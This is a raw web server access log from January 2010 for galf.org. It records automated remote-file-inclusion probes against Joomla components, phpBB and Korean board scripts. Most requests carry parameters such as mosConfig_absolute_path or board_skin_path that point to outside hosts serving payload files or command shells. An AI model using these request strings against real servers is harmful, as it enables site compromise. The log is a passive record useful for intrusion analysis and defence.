203.237.238.234 - - [25/Jan/2010:01:23:03 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:01:23:03 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:01:23:14 -0800] "GET /logs/access_090803.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:23:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:23:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:23:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:23:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:23:43 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:23:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:23:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:23:46 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:23:48 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:24:50 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:24:50 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:24:52 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:01 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:01 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:09 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:01:26:22 -0800] "GET /logs/access.log//bbs/write.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:01:26:22 -0800] "GET /bbs/write.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:01:26:22 -0800] "GET /logs//bbs/write.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:26:53 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:27:01 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:01:27:03 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:27:05 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:01:27:12 -0800] "GET /logs/access_090803.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.96.156.84 - - [25/Jan/2010:01:27:43 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.96.156.84 - - [25/Jan/2010:01:27:43 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.96.156.84 - - [25/Jan/2010:01:27:43 -0800] "GET /logs/access_090720.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:01:30:43 -0800] "GET /index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:01:30:43 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:01:30:44 -0800] "GET /index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:01:30:44 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:01:31:10 -0800] "GET /logs/access.log///include/footer.php?skin_board_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.205.214.19 - - [25/Jan/2010:01:31:10 -0800] "GET /logs///include/footer.php?skin_board_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.205.214.19 - - [25/Jan/2010:01:31:10 -0800] "GET //include/footer.php?skin_board_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
220.80.108.81 - - [25/Jan/2010:01:36:13 -0800] "GET /logs//bbs/kr_shop.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:01:36:13 -0800] "GET /bbs/kr_shop.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:01:36:14 -0800] "GET /logs/access.log//bbs/kr_shop.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:05 -0800] "GET /logs/access_090803.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:05 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:05 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:20 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:20 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:20 -0800] "GET /logs/access_090803.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:21 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:22 -0800] "GET /logs/access_090803.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:23 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:23 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:23 -0800] "GET /logs/access_090803.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:59 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:59 -0800] "GET /logs/access_090810.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:37:59 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:38:12 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [25/Jan/2010:01:38:12 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [25/Jan/2010:01:38:12 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [25/Jan/2010:01:38:16 -0800] "GET /logs/access_091116.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.73.87 - - [25/Jan/2010:01:39:22 -0800] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://food.ukzn.ac.za/help/css/bot/osi/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
122.201.73.87 - - [25/Jan/2010:01:39:22 -0800] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://food.ukzn.ac.za/help/css/bot/osi/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
122.201.73.87 - - [25/Jan/2010:01:39:22 -0800] "GET /logs/access.log//modules/Forums/admin/index.php?phpbb_root_path=http://food.ukzn.ac.za/help/css/bot/osi/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:39:28 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:39:28 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:39:28 -0800] "GET /logs/access_090810.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:40:09 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:40:09 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:40:09 -0800] "GET /logs/access_091116.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:40:18 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [25/Jan/2010:01:40:18 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [25/Jan/2010:01:40:18 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [25/Jan/2010:01:40:36 -0800] "GET /logs/access_091207.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:01:41:29 -0800] "GET /logs/access_090803.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:01:41:29 -0800] "GET /logs/access_090803.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:01:41:30 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:01:41:30 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:01:41:30 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:01:41:30 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:01:41:30 -0800] "GET /logs/access_090713.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:01:41:30 -0800] "GET /logs/access_090713.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:01:43:07 -0800] "GET /logs/access_090727.log//bbs//twindow_notice.php?board_skin_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:01:43:07 -0800] "GET /bbs//twindow_notice.php?board_skin_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:01:43:07 -0800] "GET /logs//bbs//twindow_notice.php?board_skin_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:01:43:20 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://gay-nn.ru/images/flags/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:01:43:20 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://gay-nn.ru/images/flags/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:01:43:20 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://gay-nn.ru/images/flags/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:43:49 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:43:53 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:43:53 -0800] "GET /logs/access_091221.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:01:44:05 -0800] "GET /logs/access.log%20//?_zb_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:01:44:05 -0800] "GET /?_zb_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:01:44:05 -0800] "GET /logs//?_zb_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:01:44:57 -0800] "GET /logs/access.log%20//?_zb_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:01:44:57 -0800] "GET /?_zb_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:01:44:57 -0800] "GET /logs//?_zb_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "galf.org"
85.17.199.54 - - [25/Jan/2010:01:45:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
85.17.199.54 - - [25/Jan/2010:01:45:29 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
85.17.199.54 - - [25/Jan/2010:01:45:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
85.17.199.54 - - [25/Jan/2010:01:45:30 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:01:47:17 -0800] "GET /logs/access_090803.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:01:47:17 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:01:47:17 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:01:47:18 -0800] "GET /logs/access_090713.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:01:47:48 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:01:47:48 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:01:47:49 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:01:47:49 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:48:58 -0800] "GET /logs/access_091012.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:48:58 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:48:58 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:49:49 -0800] "GET /logs/access_090720.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
